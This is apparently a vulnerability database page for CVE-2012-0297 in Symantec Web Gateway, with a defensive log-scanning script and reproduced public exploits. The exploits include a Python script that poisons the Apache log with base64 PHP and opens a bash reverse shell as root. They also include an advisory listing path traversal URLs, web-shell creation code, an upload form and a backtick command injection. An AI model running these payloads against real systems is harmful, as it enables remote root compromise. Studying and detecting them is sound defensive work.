CVE-2012-0297

Severity: critical
Published 2012-05-21 · Modified 2026-04-29
CVSS v3: —
CVSS v4: — (NEW; not yet in upstream)
VIR risk: 10.0

Description

The management GUI in Symantec Web Gateway 5.0.x before 5.0.3 does not properly restrict access to application scripts, which allows remote attackers to execute arbitrary code by (1) injecting crafted data or (2) including crafted data.
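Every public exploit for this CVE (the Exploit-DB entries and Metasploit modules listed below) has to pass through the appliance's Apache front end, so the request patterns they use are visible in the access log: a PHP tag written into the log via the request line (log poisoning), `../` or absolute paths in the `relfile`, `err` and `d` parameters, and hits on the writable `/spywall/cleaner/` directory or the `/ciu/` upload scripts. The following detection script is an added example for defenders, not part of this record, of Symantec's product, or of any exploit above. It assumes Apache "combined" log format; the parameter and script names are taken from the advisories on this page, and the sample log lines are constructed, not captured from a real appliance.

```python
#!/usr/bin/env python3
"""Flag Apache access-log lines that match the request patterns the public
CVE-2012-0297 exploits leave behind.  Added defensive example; the sample
log lines at the bottom are constructed, not real captures."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" log format.  The request field may contain \" escapes,
# so it is matched as a run of non-quote characters or backslash-escapes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Query parameters the published advisories show being fed traversal strings.
TRAVERSAL_PARAMS = {"relfile", "err", "d"}
# Script locations the advisories name as shell-drop or upload targets
# (assumed to be the only watch-list relevant here; extend as needed).
WATCHED_PATHS = ("/spywall/cleaner/", "/ciu/uploadFile.php", "/ciu/remoteRepairs.php")


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = m.group("request").split(" ")
    if len(parts) < 2:
        return None
    return {
        "ip": m.group("ip"),
        "method": parts[0],
        "target": parts[1],
        "request": m.group("request"),
        "status": m.group("status"),
    }


def escapes_directory(value):
    """True for a parameter value that climbs out of, or bypasses, the intended directory."""
    v = unquote(value)
    return "../" in v or "..\\" in v or v.startswith("/")


def findings_for(entry):
    """List the exploit indicators present in one parsed log entry."""
    hits = []
    # 1. Log poisoning: PHP code placed in the request line so it lands in the log.
    decoded_request = unquote(entry["request"]).lower()
    if "<?php" in decoded_request or "<?=" in decoded_request:
        hits.append("php_tag_in_request")
    url = urlsplit(entry["target"])
    path = unquote(url.path)
    # 2. Traversal or absolute paths in the parameters the LFI advisories abuse.
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        if name in TRAVERSAL_PARAMS and any(escapes_directory(v) for v in values):
            hits.append(f"path_escape:{name}")
    # 3. Any request touching the writable cleaner/ directory or the upload scripts.
    if any(path.startswith(p) for p in WATCHED_PATHS):
        hits.append(f"watched_path:{path}")
    return hits


def scan(lines):
    """Return (line_number, client_ip, findings) for every line with at least one finding."""
    results = []
    for n, line in enumerate(lines, 1):
        entry = parse_line(line)
        if entry is None:
            continue
        hits = findings_for(entry)
        if hits:
            results.append((n, entry["ip"], hits))
    return results


# Constructed sample log: one benign request followed by the patterns
# seen in the public exploits (base64 blob and IPs are made up).
SAMPLE_LOG = [
    '10.0.0.5 - - [15/Nov/2012:07:20:01 +0000] "GET /spywall/login.php HTTP/1.1" 200 2311',
    '10.0.0.9 - - [15/Nov/2012:07:21:13 +0000] "GET /<?php shell_exec(base64_decode(\'Wm0=\'));?> HTTP/1.1" 404 301',
    '10.0.0.9 - - [15/Nov/2012:07:21:40 +0000] "GET /spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log HTTP/1.0" 200 5925',
    '10.0.0.9 - - [15/Nov/2012:07:25:02 +0000] "GET /spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog HTTP/1.1" 200 120',
    '10.0.0.9 - - [15/Nov/2012:07:26:30 +0000] "POST /ciu/remoteRepairs.php HTTP/1.1" 200 88',
    '10.0.0.9 - - [15/Nov/2012:07:27:00 +0000] "GET /spywall/cleaner/cmd.php?cmd=id HTTP/1.1" 200 40',
]

if __name__ == "__main__":
    for n, ip, hits in scan(SAMPLE_LOG):
        print(f"line {n} from {ip}: {', '.join(hits)}")
```

Run it against `/usr/local/apache2/logs/access_log` (the path the advisories name) by replacing `SAMPLE_LOG` with the file's lines. The three checks are deliberately independent: a request can poison the log without ever reaching the vulnerable include, and a `relfile` traversal is worth an alert even when the file it names is harmless, so each pattern is reported on its own rather than only when the full chain is seen.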

Predictions

Exploit likelihood: 20%
Patch ETA: —

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.


Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-18932 webapps linux verified python · 1 KB
muts · 2012-05-26

Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code Execution

Python exploit. Source: Exploit-DB
#!/usr/bin/python

# Symantec Web Gateway 5.0.2 Remote LFI root Exploit Proof of Concept
# Exploit requires no authentication, /tmp/networkScript is sudoable and apache writable.
# muts at offensive-security dot com


import socket
import base64

payload= '''echo '#!/bin/bash' > /tmp/networkScript; echo 'bash -i >& /dev/tcp/172.16.164.1/1234 0>&1' >> /tmp/networkScript;chmod 755 /tmp/networkScript; sudo /tmp/networkScript'''
payloadencoded=base64.encodestring(payload).replace("\n","")
taint="GET /<?php shell_exec(base64_decode('%s'));?> HTTP/1.1\r\n\r\n" % payloadencoded

expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect(("172.16.164.129", 80))
expl.send(taint)
expl.close()

trigger="GET /spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log HTTP/1.0\r\n\r\n"
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect(("172.16.164.129", 80))
expl.send(trigger)
expl.close()
EDB-19406 webapps linux verified text · 2 KB
S2 Crew · 2012-06-27

Symantec Web Gateway 5.0.2.8 - Multiple Vulnerabilities

Text advisory. Source: Exploit-DB
Software: Symantec Web Gateway
Current Software Version: 5.0.2.8
Product homepage: www.symantec.com
Author: S2 Crew [Hungary]
CVE: CVE-2012-0297, CVE-2012-0298, ???

File include:
        https://192.168.82.207/spywall/previewProxyError.php?err=../../../../../../../../etc/passwd

File include and OS command execution:
        http://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd
        You can execute OS commands; just include the error_log:
        /usr/local/apache2/logs/
        -rw-r--r--   1 root   root  5925 Nov 15 07:25 access_log
        -rw-r--r--   1 root   root  3460 Nov 15 07:21 error_log

        Make a connection to port 80:
        <?php
        $f = fopen('/var/www/html/spywall/cleaner/cmd.php','w');
        $cmd = "<?php system(\$_GET['cmd']); ?>";
        fputs($f,$cmd);
        fclose($f);
        print "Shell creation done<br>";
        ?>

Arbitrary file download and delete:
        https://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog
        d parameter: the complete filename
        After the download process, the application removes the original file with root access! :)

        Command execution methods:
        Method 1:
        Download and delete the /var/www/html/ciu/.htaccess file.
        After that you can access the ciu interface on the web.
        There is an upload script: /ciu/uploadFile.php
        The user can control the filename and the upload location:
        $_FILES['uploadFile'];
        $_POST['uploadLocation'];

        Method 2:
        <form action="https://192.168.82.192/ciu/remoteRepairs.php" method="POST" enctype="multipart/form-data">
        <input type="file" name="uploadFile">
        <input type="text" name="action" value="upload">
        <input type="text" name="uploadLocation" value="/var/www/html/spywall/cleaner/">
        <input type="hidden" name="configuration" value="test">
        <input type="submit" value="upload!">
        </form>

        The "/var/www/html/spywall/cleaner" directory is writable by www-data.

Command execution after authentication:

        http://192.168.82.207/spywall/adminConfig.php (this is a deprecated config file; it should be removed)

        From the modified POST message:
        Content-Disposition: form-data; name="pingaddress"
        127.0.0.1`whoami>/tmp/1234.txt`
EDB-19065 webapps php verified
Metasploit · 2012-06-12

Symantec Web Gateway 5.0.2.8 - 'ipchange.php' Command Injection (Metasploit)

EDB-18942 remote linux verified
Metasploit · 2012-05-28

Symantec Web Gateway 5.0.2.8 - Command Execution (Metasploit)


Metasploit modules

Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection
Symantec Web Gateway 5.0.2.8 relfile File Inclusion Vulnerability

Application impact

Vendor    Product      Versions  Fixed
symantec  web_gateway  5.0
symantec  web_gateway  5.0.1
symantec  web_gateway  5.0.2

References

CWEs

CWE-264